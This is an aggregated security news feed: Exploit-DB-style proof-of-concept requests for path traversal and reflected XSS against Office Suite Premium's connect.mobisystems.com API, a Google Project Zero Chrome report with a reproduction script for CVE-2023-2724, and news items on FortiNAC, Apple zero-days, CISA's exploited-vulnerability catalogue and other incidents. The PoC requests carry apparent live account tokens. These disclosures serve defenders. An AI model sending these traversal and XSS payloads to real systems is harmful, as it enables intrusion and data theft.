Office Suite Premium version 10.9.1.42602 suffers from a local file inclusion vulnerability.

    # Exploit Title: Office Suite Premium 10.9.1.42602 -  Local File Inclusion # Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POCGET /../../../../../../../../../../../../../../../etc/hosts HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: tr-TR,tr;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Result : 127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine Url: https://connect.mobisystems.com/etc/hosts

Office Suite Premium 10.9.1.42602 Local File Inclusion

Office Suite Premium version 10.9.1.42602 suffers from a path traversal vulnerability.

    # Exploit Title: Office Suite Premium 10.9.1.42602 - Path Traversal# Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POCGET /../../../../../../../../../../../../../../../etc/hosts HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: tr-TR,tr;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Result : 127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine Url: https://connect.mobisystems.com/etc/hosts

Office Suite Premium 10.9.1.42602 Path Traversal

Office Suite Premium version 10.9.1.42602 suffers from a cross site scripting vulnerability.

    # Exploit Title: Office Suite Premium 10.9.1.42602 - Cross-Site Scripting (reflected)# Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POC# Exploit Details : Following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload.Request 1: GET /api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-code HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: en_EN,en;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Url: https://connect.mobisystems.com/api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-codePayload: <img src=a onerror=alert(1)>Parameter : applicationRequest 2 : GET /api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527 HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: en_EN,en;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Lang: en_ENGdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19URL : https://connect.mobisystems.com/api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527Payload : <img src=a onerror=alert(1)>Parameter: idRequest 3 : GET /api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=search HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: en_EN,en;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Lang: en_ENGdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19URL : https://connect.mobisystems.com/api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=searchPayload :<img src=a onerror=alert(1)>Parameter: filter

Office Suite Premium 10.9.1.42602 Cross Site Scripting

Chrome suffers from an internal javascript object access vulnerability. suffers from a code execution vulnerability.

Chrome: Internal JavaScript object access via Origin Trials

VULNERABILITY DETAILS  
1. `JSObject::DefineAccessor` doesn't ensure that the receiver object is in a valid state before creating an accessor property. This allows callers to extend non-extensible objects and reconfigure non-configurable properties.  
2. The function is reachable from `IDLMemberInstaller::InstallAttributes`:  
```  
IDLMemberInstaller::InstallAttributes ->  
InstallAttribute ->  
Object::SetAccessorProperty ->  
JSObject::DefineAccessor  
```  
3. When an origin trial is activated through a `meta` tag, `InstallAttributes` might be called on a JS object that has already been modified by the user code.  
4. Some origin trials install attributes directly on the global object.

To exploit the issue:

1. Add a non-configurable property to the global object.  
2. Compile a JS function that accesses the property. The compilation dependency in [1] will be skipped.  
3. Enable an origin trial that redefines the property as configurable.  
4. Delete the property.

After that, the compiled function will reference an invalid property cell and leak the internal hole object. This is a known vulnerable condition that can be abused to execute arbitrary code.

[1] https://source.chromium.org/chromium/chromium/src/+/refs/heads/main:v8/src/compiler/js-native-context-specialization.cc;drc=837cc12de25a288edf3ac222f7265c9936e69552;l=1164

VERSION  
Google Chrome 112.0.5615.49 (Official Build) (arm64)  
Chromium 114.0.5713.0 (Developer Build) (64-bit) 

REPRODUCTION CASE  
```  
<body>  
<script>  
var container = [{}];  
function trigger() { container[0] = documentPictureInPicture; }

Reflect.defineProperty(  
    globalThis,  
    'documentPictureInPicture',  
    { configurable: false, writable: true, value: {} });  
documentPictureInPicture = {}; // Now `documentPictureInPicture` is a non-configurable mutable slot.  
for (let i = 0; i < 50000; i++) trigger();

// The \"Document Picture-in-Picture\" origin trial force-sets the `documentPictureInPicture` property  
// on the global object.  
meta = document.createElement('meta');  
meta.httpEquiv = 'Origin-Trial';  
meta.content =  
    'AstD02iOsmKKlxPbuURr1i4CKzX6AhBpjqxCMNIinwFqsdNThmojsMI8B7m8GGlR/DNu9i6t4eqEfHvhuvSxHgQAAABe' +  
    'eyJvcmlnaW4iOiJodHRwOi8vbG9jYWxob3N0OjgwMDAiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJl' +  
    'QVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5fQ==';  
document.head.appendChild(meta);

delete documentPictureInPicture;  
trigger();  
container[0].prop; // Trying to access a property of the hole object should cause to a crash.  
</script>  
</body>  
```

CREDIT INFORMATION  
Sergei Glazunov of Google Project Zero

This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-07-13.

Related CVE Numbers: CVE-2023-2724.

Found by: glazunov@google.com

Chrome Internal JavaScript Object Access Via Origin Trials

Fortinet has rolled out updates to address a critical security vulnerability impacting its FortiNAC network access control solution that could lead to the execution of arbitrary code.
Tracked as CVE-2023-33299, the flaw is rated 9.6 out of 10 for severity on the CVSS scoring system. It has been described as a case of Java untrusted object deserialization.
"A deserialization of untrusted data

Fortinet has rolled out updates to address a critical security vulnerability impacting its FortiNAC network access control solution that could lead to the execution of arbitrary code.

Tracked as **CVE-2023-33299**, the flaw is rated 9.6 out of 10 for severity on the CVSS scoring system. It has been described as a case of Java untrusted object deserialization.

"A deserialization of untrusted data vulnerability \[CWE-502\] in FortiNAC may allow an unauthenticated user to execute unauthorized code or commands via specifically crafted requests to the tcp/1050 service," Fortinet said in an advisory published last week.

The shortcoming impacts the following products, with patches available in FortiNAC versions 7.2.2, 9.1.10, 9.2.8, and 9.4.3 or later -

*   FortiNAC version 9.4.0 through 9.4.2
*   FortiNAC version 9.2.0 through 9.2.7
*   FortiNAC version 9.1.0 through 9.1.9
*   FortiNAC version 7.2.0 through 7.2.1
*   FortiNAC 8.8 all versions
*   FortiNAC 8.7 all versions
*   FortiNAC 8.6 all versions
*   FortiNAC 8.5 all versions, and
*   FortiNAC 8.3 all versions

Also resolved by Fortinet is a medium-severity vulnerability tracked as CVE-2023-33300 (CVSS score: 4.8), an improper access control issue affecting FortiNAC 9.4.0 through 9.4.3 and FortiNAC 7.2.0 through 7.2.1. It has been fixed in FortiNAC versions 7.2.2 and 9.4.4.

Florian Hauser from German cybersecurity firm CODE WHITE has been credited with discovering and reporting the two bugs.

The alert follows the active exploitation of another critical vulnerability affecting FortiOS and FortiProxy (CVE-2023-27997, CVSS score: 9.2) that could allow a remote attacker to execute arbitrary code or commands via specifically crafted requests.

Fortinet, earlier this month, acknowledged that the issue may have been abused in limited attacks targeting government, manufacturing, and critical infrastructure sectors, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add it to the Known Exploited Vulnerabilities (KEV) catalog.

It also comes more than four months after Fortinet addressed a severe bug in FortiNAC (CVE-2022-39952, CVSS score: 9.8) that could lead to arbitrary code execution. The flaw has since come under active exploitation shortly after a proof-of-concept (PoC) was made available.

In a related development, Grafana has released patches for a critical security vulnerability (CVE-2023-3128) that could permit malicious attackers to bypass authentication and take over any account that uses Azure Active Directory for authentication.

"If exploited, the attacker can gain complete control of a user's account, including access to private customer data and sensitive information," Grafana said. "If exploited, the attacker can gain complete control of a user's account, including access to private customer data and sensitive information."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Fortinet's FortiNAC Vulnerability Exposes Networks to Code Execution Attacks

The User Registration plugin for WordPress is vulnerable to Sensitive Information Exposure due to hardcoded encryption key on the 'lock_content_form_handler' and 'display_password_form' function in versions up to, and including, 3.7.3. This makes it possible for unauthenticated attackers to decrypt and view the password protected content.

CVE-2023-3371: Helper.php in embedpress/tags/3.7.3/EmbedPress/Includes/Classes – WordPress Plugin Repository

A potential vulnerability in the LenovoFlashDeviceInterface SMI handler may allow an attacker with local access and elevated privileges to execute arbitrary code.

**About Lenovo**

*   Our Company
*   News
*   Investor Relations
*   Sustainability
*   Product Compliance
*   Product Security
*   Lenovo Open Source
*   Legal Information
*   Jobs at Lenovo

**Shop**

*   Laptops & Ultrabooks
*   Tablets
*   Desktops & All-in-Ones
*   Workstations
*   Accessories & Software
*   Servers
*   Storage
*   Networking
*   Laptop Deals
*   Outlet

**Support**

*   Drivers & Software
*   How To's
*   Warranty Lookup
*   Parts Lookup
*   Contact Us
*   Repair Status Check
*   Imaging & Security Resources

**Resources**

*   Where to Buy
*   Shopping Help
*   Track Order Status
*   Product Specifications (PSREF)
*   Forums
*   Registration
*   Product Accessibility
*   Environmental Information
*   Gaming Community
*   LenovoEDU Community
*   LenovoPRO Community

© Lenovo.  
| | | |

CVE-2023-2290: ThinkPad BIOS Vulnerabilities - Lenovo Support US

The U.S. Cybersecurity and Infrastructure Security Agency has added a batch of six flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
This comprises three vulnerabilities that Apple patched this week (CVE-2023-32434, CVE-2023-32435, and CVE-2023-32439), two flaws in VMware (CVE-2023-20867 and CVE-2023-20887), and one shortcoming impacting Zyxel

The U.S. Cybersecurity and Infrastructure Security Agency has added a batch of six flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.

This comprises three vulnerabilities that Apple patched this week (CVE-2023-32434, CVE-2023-32435, and CVE-2023-32439), two flaws in VMware (CVE-2023-20867 and CVE-2023-20887), and one shortcoming impacting Zyxel devices (CVE-2023-27992).

CVE-2023-32434 and CVE-2023-32435, both of which allow code execution, are said to have been exploited as zero-days to deploy spyware as part of a years-long cyber espionage campaign that commenced in 2019.

Dubbed Operation Triangulation, the activity culminates in the deployment of TriangleDB that's designed to harvest a wide range of information from compromised devices, such as creating, modifying, removing, and stealing files, listing and terminating processes, gathering credentials from iCloud Keychain, and tracking a user's location.

The attack chain begins with the targeted victim receiving an iMessage with an attachment that automatically triggers the execution of the payload without requiring any interaction, making it a zero-click exploit.

"The malicious message is malformed and does not trigger any alerts or notifications for \[the\] user," Kaspersky noted in its initial report.

CVE-2023-32434 and CVE-2023-32435 are two of many vulnerabilities in iOS that have been abused in the espionage attack. One among them is CVE-2022-46690, a high-severity out-of-bounds write issue in IOMobileFrameBuffer that could be weaponized by a rogue app to execute arbitrary code with kernel privileges.

The weakness was remediated by Apple with improved input validation in December 2022.

Kaspersky flagged TriangleDB as containing unused features referencing macOS as well as permissions seeking access to the device's microphone, camera, and the address book that it said could be leveraged at a future date.

The Russian cybersecurity company's investigation into Operation Triangulation began at the start of the year when it detected the compromise in its own enterprise network.

In light of active exploitation, Federal Civilian Executive Branch (FCEB) agencies are recommended to apply vendor-provided patches to secure their networks against potential threats.

The development comes as CISA issued an alert warning of three bugs in the Berkeley Internet Name Domain (BIND) 9 Domain Name System (DNS) software suite that could pave the way for a denial-of-service (DoS) condition.

The flaws – CVE-2023-2828, CVE-2023-2829, and CVE-2023-2911 (CVSS scores: 7.5) – could be exploited remotely, resulting in the unexpected termination of the named BIND9 service or exhaustion of all available memory on the host running named, leading to DoS.

This is the second time in less than six months that the Internet Systems Consortium (ISC) has released patches to resolve similar issues in BIND9 that could cause DoS and system failures.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

U.S. Cybersecurity Agency Adds 6 Flaws to Known Exploited Vulnerabilities Catalog

Plus: Discord has a child predator problem, fears rise of China spying from Cuba, and hackers try to blackmail Reddit.

Apple says the patches fix a memory corruption that allowed an app to execute arbitrary code and a WebKit vulnerability that enabled malicious code execution through web content. The attacks have been seen only on devices running versions of iOS released before iOS 15.7, according to the company. Even if you’re an unlikely target for spyware, now’s a good time to update your iPhone.

This week, an alarming investigation by NBC News found that Discord, a social media popular with gamers, has become a popular venue for child sexual exploitation. NBC News identified 35 cases over the past six years in which adults have faced charges of kidnapping, grooming, or sexual assault that were allegedly facilitated by Discord. Nearly half of these cases resulted in guilty pleas or verdicts, while many others are still under investigation.

NBC News’ review of cases is likely a vast undercount, the report says, as these numbers represent only reported cases where charges were brought. Victims generally face significant challenges when it comes to reporting, investigations, and prosecution. Stephen Sauer, the director of the tip line at the Canadian Centre for Child Protection, told NBC News, “What we see is only the tip of the iceberg.”

According to experts interviewed by NBC News, while online child exploitation is not exclusive to Discord, the platform's decentralized moderation system and its young user base have likely made it an appealing environment for those seeking to exploit children.

The investigation comes as a _Washington Post_ report found that thousands of AI-generated child sexual abuse images have been found on forums across the dark web.

According to _The Wall Street Journal_, US officials have been monitoring the activities of employees working for Chinese telecom companies Huawei Technologies and ZTE at suspected spy facilities in Cuba. The news comes amid a push to restrict the use of Huawei and ZTE mobile infrastructure across the West.

Earlier this month, the _Journal_ reported that China has been operating a spy base in Cuba since at least 2019 and that the two countries jointly maintain four additional eavesdropping stations on the island. Officials from the Biden administration caution that these facilities could potentially intercept electronic signals from US military bases.

According to representative Mike Gallagher, the chairman of the US House Select Committee on the Chinese Communist Party, Huawei and ZTE have had regular business presence in Cuba while working to modernize the island’s internet infrastructure. In a letter Gallagher sent to director of national intelligence Avril Haines, which the _Journal_ viewed, Gallagher wrote that any enhancement of China’s intelligence capabilities in Cuba “is likely” to be aided by Chinese telecommunications companies.

In a statement, Huawei described the report as "groundless accusations" and emphasized its commitment to full compliance with applicable laws and regulations in the regions they operate. Similarly, ZTE dismissed the _Journal_'s reporting as "baseless."

The recent Reddit protest over changes to its business that threaten third-party apps was messy enough without hackers getting involved. The ransomware gang BlackCat is threatening to release some 80 GB of data that the company says was stolen earlier this year through a “highly targeted” phishing attack.

Reddit says it doesn’t believe the hackers stole user data like passwords, but BlackCat says the files contain “confidential” information. The group is demanding Reddit pay $4.5 million and cancel its plans to charge app developers exorbitant fees for access to its application programming interface, or API. Otherwise the group says, it will release the data ahead of the company’s planned IPO.

Update Your iPhone Right Now to Fix 2 Apple Zero Days

Unknown senders have been shipping smartwatches to service members, leading to questions regarding what kind of ulterior motive is at play, malware or otherwise.

The US Army's Criminal Investigation Division (CID) is warning service members to look out for unsolicited smartwatches arriving in the mail, which likely carry risks of malware and allowing unauthorized access to sensitive systems.

When used, the smartwatches are able to auto-connect to the local Wi-Fi network, and can also connect to cellphones, thus allowing access to a user's data. The snooped information can be private and used to exploit a victim, the advisory warned, and it's possible that these watches also carry malware that could allow a threat actor to access, save, or transfer data such as banking information, account information, or personal contacts. 

"Most people have heard about techniques involving leaving random malicious USB devices around for curious victims to plug in. This 'surprise smartwatch' tactic leverages the same human curiosity, and grants a threat actor access to some of your most sensitive personal information," said Melissa Bischoping, director of endpoint security research at Tanium, in an emailed comment. "As the adage goes, if it's too good to be true, it probably is, and if you're not paying for the product, you ARE the product."

Alternatively, these mystery smartwatches sent from unknown senders could also be used for a practice known as "brushing," in which presumably counterfeit products are sent via mail to random individuals so that companies can write positive reviews in the name of the person they sent the product to.

Should anyone, military personnel or otherwise, receive a product such as this, the CID advises recipients not to turn it on and to report it to local counterintelligence, or through its "Report a Crime" portal, where individuals can also submit tips.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Tag

#ios